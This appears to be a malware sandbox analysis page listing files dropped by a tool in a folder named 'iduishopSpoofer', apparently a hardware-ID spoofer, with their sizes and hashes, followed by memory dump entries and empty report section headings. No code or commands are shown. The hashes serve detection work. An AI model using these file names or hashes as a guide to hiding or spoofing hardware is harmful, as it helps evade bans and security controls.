f815ad8516aa3d4c4f35abc2a42b8e6119cd2a022d9475e2c9cc25649736a89cb7b46f2b3def79bfdcb82bc9798de397a8b95f6fe04ba337c90d1c1b85cb4861

Download Submit
C:\iduishopSpoofer\AMIDEWIN.EXE

Filesize
148KB

MD5
182ec3a59bd847fb1bc3e12a41d48fa6

SHA1
2f548bceb819d3843827c1e218af6708db447d4b

SHA256
948dbd2bc128f8dc08267e110020fee3ff5de17cf4aaef89372de29623af96fa

SHA512
91ecc5a76edc2aea4219f68569b54d3e9fe15c2a30a146edc0d09e713feaa739a5c1e7dbfa97e60828696078d43d1f8fd3466234525b099ed6e614e854ac6c4c

Download Submit
C:\iduishopSpoofer\AMIDEWINx64.EXE

Filesize
453KB

MD5
6a6505b2413d2c7b16c6d059448db9e5

SHA1
dfe6c6b6051c26326a12dc9d0d5701cb4728266c

SHA256
53e3b72f8eb13acf3cb69d4cb124e8dc64fc541555c3c95cc8003b8046853955

SHA512
1c0531581f0efe683ab763f6633ace60f0637b22830e7ec551babe19ac777a1a6821dc568bce13a8abee8bfef1c7d9397e0bee1c78c00810c65dadd788dab2a3

Download Submit
C:\iduishopSpoofer\DMI16.EXE

Filesize
30KB

MD5
2a89d4e479351022ab8bd604030a76f3

SHA1
ad1d39fd38fafaae4d77eed5f1c67f665686736d

SHA256
28e6e1908f2996af9b7a9930f13d4c770d6963425df0869ce4bcdb1442a4a917

SHA512
0fb48aaeeedb5a96246ffd80c167f501ff2f5a08cf8d2dbf63373666c6f3394244395e05e49b68fedf02c2a3df75ad6ba4223f0066c350993233cf218da83e43

Download Submit
C:\iduishopSpoofer\DMIEDIT.EXE

Filesize
3.2MB

MD5
fbaf6262fd84f9966338518d4de46fdd

SHA1
291d481e3b42029e157e7c60febc8fe67cd50cf1

SHA256
5d37e5e7ce01549965bf2166adcba33d1e2c4bd2c90711032f3987b58452ce49

SHA512
5d8cc6e1ab85fae8d9a5ffa83cecc2608b1fbbb28b9e80afe2dc6f7d46b657d489e03f75e42fc147d49313b3a41ad768fd0f320a905cbc41d767c0fc3c3d9d7e

Download Submit
C:\iduishopSpoofer\OS.bat

Filesize
23KB

MD5
2dc7690d9652909b06ab1a5e27980b00

SHA1
14a03dddc3cc7962a63398f73739d8c8fbe1e994

SHA256
3271c47c5c48ffff857d6d120c068a6be8d9f4aa23730df796a357a6b7e011cb

SHA512
13c252df3a7f7a3de3e63d915b770ff0f9fe223bc2002728f11ad4568ca276efe54bd072f5b660d43edcdd44c81a73489b1ad33f63b9f3cb0b8f533f39dcaafe

Download Submit
C:\iduishopSpoofer\SX.exe

Filesize
2.8MB

MD5
83035d6f6c95bbee91cebfda3ce8e717

SHA1
c276fb8f9c498adcbfcae06e87cf1ec63f9795cc

SHA256
039f49f63a4173ed8451b471eef7fa40a3354fc6353213d59a51936dabfc6760

SHA512
45ed62ce82c24914441b1bd69bff75b5b627895abf3a9bd29edcaca68f3a45ca80e87d78db293d6b681c5e4e40dda2dd5c0ce4234f5b4872a3d7f0b34978dbaf

Download Submit
C:\iduishopSpoofer\UCOREDLL.DLL

Filesize
112KB

MD5
8370f3114924ed6c53741de7a253625a

SHA1
f7782d51e73526226a89229b4f3625c7ce43f3b3

SHA256
78a4d8e5e8c33793e5a2020325d3a49e92e4826167742e93179bdacbf167b409

SHA512
5a13c0fb787366869fac57139fa2ebbd0c34a1bfa76c05ac879da60e534cbac694385f2b6120fdb6c7cf0e62cf4948efbdfde96e695a9d377f44eedb2e1b1398

Download Submit
C:\iduishopSpoofer\UCORESYS.SYS

Filesize
15KB

MD5
9555d36fb21b993e5c4b98c2fc2b3671

SHA1
210a98be7da32cea98618c5a9640c23ce518c0ee

SHA256
fd6f56189cd723b32fc06392867fcd5128e63d8b5801e4f7a83523f820531981

SHA512
3ec96ba6fca7a4aa45becfef84b23b12c305f34045ac1a15b22745289e33b9326103e853bad698434df772a76515e7e8109fa8724d65f0351ee380c16d888c60

Download Submit
C:\iduishopSpoofer\UCOREVXD.VXD

Filesize
7KB

MD5
211b3cda6ee0f7a8c86ffc2e5177020d

SHA1
580685b23248316878560c131b7bffbd1fa5a56c

SHA256
0c30287deb78a25a4037fc3201062ddf880b06ea436550d83f47fb7fcac7dcf4

SHA512
24abb3327282048a651102ecdb3a284c4f4761013d337ee3255f6c475c203650363899b6505b32dadd6c35f31908f2ad2987ab83c46b4d4911ebcf24cf5eccc8

Download Submit
C:\iduishopSpoofer\UCOREW64.SYS

Filesize
14KB

MD5
a17c58c0582ee560c72f60764ed63224

SHA1
bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825

SHA256
a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200

SHA512
a820a3280da690980a9297fe1e62356eba1983356c579d1c7ea8d6f64bc710b11b0a659c5d6b011690863065541f5627c4e3bc13c02087493de7e63d60981063

Download Submit
C:\iduishopSpoofer\Volumeid.exe

Filesize
228KB

MD5
4d867033b27c8a603de4885b449c4923

SHA1
f1ace1a241bab6efb3c7059a68b6e9bbe258da83

SHA256
22a2484d7fa799e6e71e310141614884f3bc8dad8ac749b6f1c475b5398a72f3

SHA512
b5d6d4a58d8780a43e69964f80525905224fa020c0032e637cd25557097e331f63d156cceaaacfe1a692ca8cea8d8bd1b219468b6b8e4827c90febe1535a5702

Download Submit
C:\iduishopSpoofer\Volumeid64.exe

Filesize
165KB

MD5
81a45f1a91448313b76d2e6d5308aa7a

SHA1
0d615343d5de03da03bce52e11b233093b404083

SHA256
fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd

SHA512
675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

Download Submit
C:\iduishopSpoofer\amifldrv32.sys

Filesize
14KB

MD5
8d3e1fb3111388c775c5e0b3f3dac9eb

SHA1
3216a83ec00e805ac30c359ad07706f9ac65cebf

SHA256
af9ecfefe947b93769364de7a0fdec145bb198e926164ed3e0617b0beadf969d

SHA512
d987df8389d69f9035340d8cec56d7464ef267cf5201ac3c70e29b4f994b73b069c5a50d7ff2f4510bd7305f2c620cfd812e79b0559d371f703e5fba00d8c637

Download Submit
C:\iduishopSpoofer\amifldrv64.sys

Filesize
18KB

MD5
785045f8b25cd2e937ddc6b09debe01a

SHA1
029c678674f482ababe8bbfdb93152392457109d

SHA256
37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba

SHA512
40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

Download Submit
C:\iduishopSpoofer\host.txt

Filesize
2KB

MD5
8c1e23bbedd7d0951217fc095fecbd48

SHA1
b7c0323f215dcfbc35f32a178ac4dc3527553b1a

SHA256
9ba787ee2824879e68501320fb59d4f7925afb0390a84dd0c32dda7740909b33

SHA512
4c05fd76e7c3bf580625cba6c49b5c8401dccd63d83afbae34bd01c81945aa82155c7b436f18286eb42542107160c3c9006f9535a7bcee67787dd30e16e68ace

Download Submit
C:\iduishopSpoofer\mac.txt

Filesize
157KB

MD5
031ea2f82b7e23bff1d077fe8db1cfb5

SHA1
e5f99fa46093d23e871ffa3ac62644519453bcfa

SHA256
c87f35df9e5109c7be9cb970e101ca47e268daecfb967fe07281ac482183d297

SHA512
37e288d8cc50c3c8a76ec0d6d9f9cc4da6e7d4a32852ff83c5d73d93220fcaa049004a07358ac3238dacfaca1e3db49fb9f9ea2a9665d77951816ed8464890fe

Download Submit
C:\iduishopSpoofer\productkey.bat

Filesize
1KB

MD5
965d6774a043bd8726ae789e24356ad9

SHA1
224fecdfacb8645a667a2c592f3a5cf7c73aeecd

SHA256
d552dfe962ecc0fc11a362d690df1ad8a63f6e7ed913947e77a9212b8d475820

SHA512
d535d958dab881b3f3635da398738a2b367fa06e2a319d56f8aaf6f1a3b6ad7dab39c3a4268b6f7480c8ce00c79612a73da570ba9333554b89c7531781e97ef3

Download Submit
C:\iduishopSpoofer\user.txt

Filesize
295KB

MD5
9902e0423d2257fdbc94001f966abb90

SHA1
3cfb16a6a1301028b91d6fb6c1a1ede7cbe43888

SHA256
c436f75ff2c6a141f221543c5b3cadccf51c085b8814b1400b3e88829aa14f52

SHA512
b8115b2969ccf555e9f85abe9c88218519f0e5c9673d9343e12dec7411abe332ab7877157698e4261601441bfadd0f1d3496254abbba7c3f3b24493960af3ce1

Download Submit
C:\iduishopSpoofer\vgk.bat

Filesize
43B

MD5
c33aa51be9dee1a4076304f0da7e460b

SHA1
d165cf26285578c6260b725e9c85538adc7d7020

SHA256
196f037bf44db8cc7377f48269e74fafdfaee7ceb441f4393e8541be13ff2ae8

SHA512
8519e16130a0f340e814a2e4fea2b76de47284cba5fea5860eeda39c94542d526006ffe253b9c02f55801544c0d0537b8b48aed1801cf357fbbc068ff09cceac

Download Submit
C:\iduishopSpoofer\vlmd.bat

Filesize
198B

MD5
2fa81df36e7ed8431984426811946cf8

SHA1
34303057d88fb480cffd078ac4840d9cb20a56de

SHA256
8dc05e96c56d9dbad968b194a4031a360d0458f7ddcbf66367a2b7dd17a0315b

SHA512
2d763930fc36588eb88627ccfa01d0e383206ce2204d686df71a5b40f3536e130f2c8c35dd8597b19bf778041c320215230a91dbb2ed9ae7e4727ab7a31a6a63

Download Submit
memory/708-1711-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/708-1823-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/708-1273-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/708-1369-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/708-418-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/708-759-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/1312-0-0x0000000002340000-0x0000000002341000-memory.dmp

Filesize
4KB

Download
memory/1312-127-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/1552-912-0x0000000000BC0000-0x0000000000BD0000-memory.dmp

Filesize
64KB

Download
memory/2320-1322-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2320-1323-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2396-256-0x00007FFC72250000-0x00007FFC72260000-memory.dmp

Filesize
64KB

Download
memory/2396-257-0x00007FFC72250000-0x00007FFC72260000-memory.dmp

Filesize
64KB

Download
memory/2396-258-0x00007FFC6F9C0000-0x00007FFC6F9D0000-memory.dmp

Filesize
64KB

Download
memory/2396-259-0x00007FFC6F9C0000-0x00007FFC6F9D0000-memory.dmp

Filesize
64KB

Download
memory/2396-253-0x00007FFC72250000-0x00007FFC72260000-memory.dmp

Filesize
64KB

Download
memory/2396-255-0x00007FFC72250000-0x00007FFC72260000-memory.dmp

Filesize
64KB

Download
memory/2396-254-0x00007FFC72250000-0x00007FFC72260000-memory.dmp

Filesize
64KB

Download
memory/2640-1256-0x0000000000250000-0x000000000028C000-memory.dmp

Filesize
240KB

Download
memory/2848-512-0x00000000006D0000-0x00000000006DE000-memory.dmp

Filesize
56KB

Download
memory/2932-681-0x00000184E66A0000-0x00000184E6716000-memory.dmp

Filesize
472KB

Download
memory/2932-682-0x00000184E4CE0000-0x00000184E4D30000-memory.dmp

Filesize
320KB

Download
memory/2932-680-0x00000184FEFD0000-0x00000184FF192000-memory.dmp

Filesize
1.8MB

Download
memory/2932-670-0x00000184E4800000-0x00000184E4886000-memory.dmp

Filesize
536KB

Download
memory/2932-887-0x0000018480E60000-0x0000018481388000-memory.dmp

Filesize
5.2MB

Download
memory/2932-902-0x00000184E4D50000-0x00000184E4D6E000-memory.dmp

Filesize
120KB

Download
memory/2932-889-0x00000184E4CB0000-0x00000184E4CC2000-memory.dmp

Filesize
72KB

Download
memory/3192-758-0x0000021FFFF60000-0x0000021FFFF82000-memory.dmp

Filesize
136KB

Download
memory/3360-879-0x0000000000190000-0x00000000004B4000-memory.dmp

Filesize
3.1MB

Download
memory/3496-1688-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3744-886-0x00000000006A0000-0x00000000008F0000-memory.dmp

Filesize
2.3MB

Download
memory/3744-888-0x00000000006A0000-0x00000000008F0000-memory.dmp

Filesize
2.3MB

Download
memory/3908-749-0x000000001CC20000-0x000000001CCD2000-memory.dmp

Filesize
712KB

Download
memory/4228-651-0x00000000000D0000-0x00000000003F4000-memory.dmp

Filesize
3.1MB

Download
memory/4488-417-0x0000000000400000-0x00000000004C5000-memory.dmp

Filesize
788KB

Download
memory/4488-130-0x0000000002120000-0x0000000002121000-memory.dmp

Filesize
4KB

Download
memory/4948-226-0x0000000004F20000-0x0000000004FBC000-memory.dmp

Filesize
624KB

Download
memory/4948-135-0x0000000000550000-0x0000000000558000-memory.dmp

Filesize
32KB

Download
memory/4992-469-0x00000000008C0000-0x00000000008D2000-memory.dmp

Filesize
72KB

Download
memory/4992-471-0x0000000005250000-0x000000000525A000-memory.dmp

Filesize
40KB

Download
memory/4992-472-0x0000000005550000-0x00000000055A6000-memory.dmp

Filesize
344KB

Download
memory/5176-624-0x0000000007390000-0x00000000073D6000-memory.dmp

Filesize
280KB

Download
memory/5356-1399-0x0000000000560000-0x0000000000884000-memory.dmp

Filesize
3.1MB

Download
memory/5568-627-0x0000000000B40000-0x0000000000E64000-memory.dmp

Filesize
3.1MB

Download
memory/5712-313-0x0000000005320000-0x0000000005386000-memory.dmp

Filesize
408KB

Download
memory/5712-297-0x0000000000810000-0x000000000087E000-memory.dmp

Filesize
440KB

Download
memory/5712-298-0x0000000005790000-0x0000000005D36000-memory.dmp

Filesize
5.6MB

Download
memory/5712-334-0x0000000006450000-0x000000000648C000-memory.dmp

Filesize
240KB

Download
memory/5712-332-0x0000000005770000-0x0000000005782000-memory.dmp

Filesize
72KB

Download
memory/5712-301-0x0000000005280000-0x0000000005312000-memory.dmp

Filesize
584KB

Download
memory/5968-373-0x0000000000A20000-0x0000000000D52000-memory.dmp

Filesize
3.2MB

Download
memory/5980-1360-0x0000000000460000-0x0000000000476000-memory.dmp

Filesize
88KB

Download
memory/6064-401-0x00000000073C0000-0x00000000073D1000-memory.dmp

Filesize
68KB

Download
memory/6064-387-0x0000000007040000-0x0000000007074000-memory.dmp

Filesize
208KB

Download
memory/6064-414-0x0000000007430000-0x0000000007438000-memory.dmp

Filesize
32KB

Download
memory/6064-409-0x0000000007440000-0x000000000745A000-memory.dmp

Filesize
104KB

Download
memory/6064-406-0x0000000007400000-0x0000000007415000-memory.dmp

Filesize
84KB

Download
memory/6064-343-0x0000000002840000-0x0000000002876000-memory.dmp

Filesize
216KB

Download
memory/6064-402-0x00000000073F0000-0x00000000073FE000-memory.dmp

Filesize
56KB

Download
memory/6064-344-0x0000000005030000-0x000000000565A000-memory.dmp

Filesize
6.2MB

Download
memory/6064-400-0x0000000007240000-0x000000000724A000-memory.dmp

Filesize
40KB

Download
memory/6064-350-0x0000000004F40000-0x0000000004F62000-memory.dmp

Filesize
136KB

Download
memory/6064-399-0x00000000081A0000-0x000000000881A000-memory.dmp

Filesize
6.5MB

Download
memory/6064-360-0x00000000057F0000-0x0000000005B47000-memory.dmp

Filesize
3.3MB

Download
memory/6064-351-0x0000000005710000-0x0000000005776000-memory.dmp

Filesize
408KB

Download
memory/6064-398-0x00000000070B0000-0x0000000007154000-memory.dmp

Filesize
656KB

Download
memory/6064-397-0x0000000007080000-0x000000000709E000-memory.dmp

Filesize
120KB

Download
memory/6064-388-0x000000006F790000-0x000000006F7DC000-memory.dmp

Filesize
304KB

Download
memory/6064-377-0x0000000005CE0000-0x0000000005CFE000-memory.dmp

Filesize
120KB

Download
memory/6064-378-0x0000000005D90000-0x0000000005DDC000-memory.dmp

Filesize
304KB

Download
memory/6064-385-0x0000000006200000-0x000000000621A000-memory.dmp

Filesize
104KB

Download
memory/6064-384-0x0000000006F20000-0x0000000006FB6000-memory.dmp

Filesize
600KB

Download
memory/6064-386-0x0000000006260000-0x0000000006282000-memory.dmp

Filesize
136KB

Download
memory/6184-1311-0x0000000000C60000-0x0000000000F84000-memory.dmp

Filesize
3.1MB

Download
memory/6216-1471-0x0000000000270000-0x00000000002F4000-memory.dmp

Filesize
528KB

Download
memory/6492-999-0x0000000000730000-0x0000000000746000-memory.dmp

Filesize
88KB

Download
memory/6576-1010-0x0000000000D20000-0x0000000000D28000-memory.dmp

Filesize
32KB

Download
memory/6668-1042-0x0000019C619B0000-0x0000019C619BA000-memory.dmp

Filesize
40KB

Download
memory/6668-1038-0x0000019C61970000-0x0000019C6198C000-memory.dmp

Filesize
112KB

Download
memory/6668-1039-0x0000019C61990000-0x0000019C6199A000-memory.dmp

Filesize
40KB

Download
memory/6668-1040-0x0000019C619A0000-0x0000019C619A8000-memory.dmp

Filesize
32KB

Download
memory/6760-1041-0x000000000A070000-0x000000000A59C000-memory.dmp

Filesize
5.2MB

Download
memory/6760-1028-0x0000000000AC0000-0x0000000000B4C000-memory.dmp

Filesize
560KB

Download
memory/6760-1029-0x0000000002F60000-0x0000000002F66000-memory.dmp

Filesize
24KB

Download
memory/7000-1049-0x0000000000EF0000-0x0000000000F58000-memory.dmp

Filesize
416KB

Download
memory/7000-1048-0x0000000000EF0000-0x0000000000F58000-memory.dmp

Filesize
416KB

Download
memory/7000-1053-0x0000000000EF0000-0x0000000000F58000-memory.dmp

Filesize
416KB

Download
memory/7140-1515-0x000002D88C840000-0x000002D88C85A000-memory.dmp

Filesize
104KB

Download
memory/7188-1820-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/7284-1388-0x000000006F790000-0x000000006F7DC000-memory.dmp

Filesize
304KB

Download
memory/7284-1417-0x0000000007E50000-0x0000000007E61000-memory.dmp

Filesize
68KB

Download
memory/7284-1397-0x0000000007AD0000-0x0000000007B74000-memory.dmp

Filesize
656KB

Download
memory/7284-1436-0x0000000007E90000-0x0000000007EA5000-memory.dmp

Filesize
84KB

Download
memory/7740-1461-0x0000000000970000-0x0000000000C94000-memory.dmp

Filesize
3.1MB

Download
memory/8092-1504-0x0000000000780000-0x00000000007DE000-memory.dmp

Filesize
376KB

Download
memory/8092-1512-0x0000000005140000-0x00000000051FC000-memory.dmp

Filesize
752KB

Download
memory/8092-1514-0x0000000005820000-0x0000000005E38000-memory.dmp

Filesize
6.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v16

Replay Monitor

Loading Replay Monitor...

Downloads